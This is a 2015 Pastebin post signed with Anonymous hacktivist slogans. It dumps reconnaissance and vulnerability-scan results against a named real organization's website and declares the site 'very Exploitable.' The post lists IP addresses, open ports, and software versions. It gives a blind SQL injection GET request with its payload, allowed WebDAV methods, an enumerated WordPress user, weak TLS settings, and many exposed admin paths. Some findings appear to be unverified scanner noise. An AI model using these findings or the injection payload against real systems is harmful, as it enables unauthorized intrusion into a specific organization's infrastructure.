Title: Exploitation/www.iqt.org Author: Sneakyone12 Pastebin link: http://pastebin.com/w0q4NgNj First Edit: Wednesday 29th of April 2015 09:51:41 AM CDT Last Edit: Wednesday 29th of April 2015 09:51:41 AM CDT We are Anonymous We are Legion We do not forgive We do not forget Expect us.   Hacktivist's Forever.   Pentest of iqt.org @ 65% / very Exploitable from every Angle . == https://www.iqt.org/ -- Non-authoritative answer: Name:   www.iqt.org Address: 38.127.128.20 -- scan report for 38.127.128.20 Host is up (0.025s latency). PORT     STATE    SERVICE 80/tcp   open     http --/ Server Type:  lighttpd/1.4.35 <<< Server exploit SQL Injection ) -- 38.127.128.20   0 site(s) hosted on ip 38.127.128.20 Location:   Arlington,United States ---   HTTP Headers for www.iqt.org ==============   HTTP/1.1 301 Moved Permanently Location: https://www.iqt.org/ Connection: close Date: Wed, 29 Apr 2015 11:30:15 GMT Server: lighttpd/1.4.35 ----/ MD5 sum of host name:           5a6d285e45428841aefff0f8eca149e5 SHA1 sum of host name:          7060e392c2e06f76afc2bebe65dc290eb3d07052 SHA256 sum of host name:        c43a6aae27757ec4b6ef6a9e51e2e1ba99a15217882febe9e0027132d306072b -- https://www.iqt.org/robots.txt   # robots.txt   -- Name Servers ============   ns1.iqt.org        38.103.36.99 - scan report for 38.103.36.99 Host is up (0.033s latency). PORT     STATE    SERVICE 53/tcp   open     domain 80/tcp   open     http --------------------------------   ns2.iqt.org       38.127.128.200 - scan report for ns1.iqt.org (38.127.128.200) Host is up (0.0059s latency). PORT     STATE    SERVICE 80/tcp   open     http --------------------------------   ns3.iqt.org       38.122.223.132 - scan report for 38.122.223.132 Host is up (0.0058s latency). PORT     STATE    SERVICE 80/tcp   open     http -------------------------------   www.iqt.org (38.127.128.202)   Server:lighttpd/1.4.35 IP Address:38.127.128.202 Port:443 Hostname:www.iqt.org   EXPLOITS: =========   The whole target has no protection (X-Frame-Options header) against ClickJacking attack --- Blind SQL injection was found at: "https://www.iqt.org/", using HTTP method GET. The injectable parameter is: "s".   GET https://www.iqt.org/?s=95"%20OR%20"95"="95&searchsubmit-mobile=Hello%20World HTTP/1.1 Host: www.iqt.org --- The target site *has* a DNS wildcard configuration. --- X-Powered-By" header for this HTTP server is: "PHP/5.3.21". --- The URL "https://www.iqt.org/" has the following allowed methods, which include DAV methods: ACL, CHECKIN, CHECKOUT, CONNECT, COPY, GET, HEAD, LABEL, LINK, LOCK, MERGE, MKACTIVITY, MKCOL, MKWORKSPACE, MOVE, OPTIONS, PATCH, POST, PROPFIND, PROPPATCH, REPORT, SEARCH, TRACE, UNCHECKOUT, UNLINK, UNLOCK. --- https://www.iqt.org/wp-login.php   WordPress version "2.7.1" found from data   GET https://www.iqt.org/wp-includes/js/thickbox/thickbox.css HTTP/1.1 Host: www.iqt.org Cookie: wordpress_test_cookie=WP+Cookie+check --- WordPress user "500" found from enumeration.   GET https://www.iqt.org/?author=2 HTTP/1.1 Host: www.iqt.org Cookie: wordpress_test_cookie=WP+Cookie+check ---google     -- Server configuration contains weak cipher suites Cipher suites with known weaknesses should be disabled - Server may have sent unnecessary certificates in the SSL/TLS negotiation Users may experience slower performance - Server uses RC4 cipher with modern browsers More secure ciphers are available for TLS 1.1 and newer - Server is using RC4-based ciphersuites which have known vulnerabilities Evaluate your client compatibility requirements to determine if you can disable RC4-based ciphersuites - Server configuration does not meet FIPS guidelines Federal standards for data handling are not being met -   SSL Configuration: =================   SSL 3.0 Disabled:Fail - Weak ciphersuites disabled:Fail - OCSP Stapling:Fail - PCI Compliant:Fail - FIPS Compliant:Fail   Certificate Chain Tests: =======================   Unnecessary Certificates in Chain:Fail   HTTP Tests: ===========   Domain name resolves to IPv6 address:Fail     -----------------------------------------------------------------------------------------------   File check: ==========   URL: https://www.iqt.org/admin/index.php                                                                 | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/administrator/index.php                                                         | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/board/index.php                                                                 | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/ccms/index.php                                                                 | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/community/index.php                                                             | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/faqman/index.php                                                               | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/index.php                                                                       | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/livredor/index.php                                                             | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/modules/Search/index.php                                                       | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/php/gaestebuch/admin/index.php                                                 | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/php/index.php                                                                   | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/robots.txt                                                                     | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/htx/sqlqhit.asp                                                         | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/htx/SQLQHit.asp                                                         | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/SQLQHit.asp                                                             | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/search/sqlqhit.asp                                                             | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/staticpages/index.php                                                           | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/supporter/index.php                                                             | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/ttforum/index.php                                                               | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/wp-content/plugins/akismet/readme.txt                                           | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/xmlrpc.php                                                                     | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/zentrack/index.php     ======================================================================   Directory check:                                                               | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/feed/                                                                           | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/home/                                                                           | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/news/                                                                           | [+] CODE: HTTP/1.0 200 OK URL: https://www.iqt.org/rss/     ======================================================================     Deep in the Matrix you will find us " watching you 'watching us'watching you"   Big ups to the Anonymous Family WorldWide <3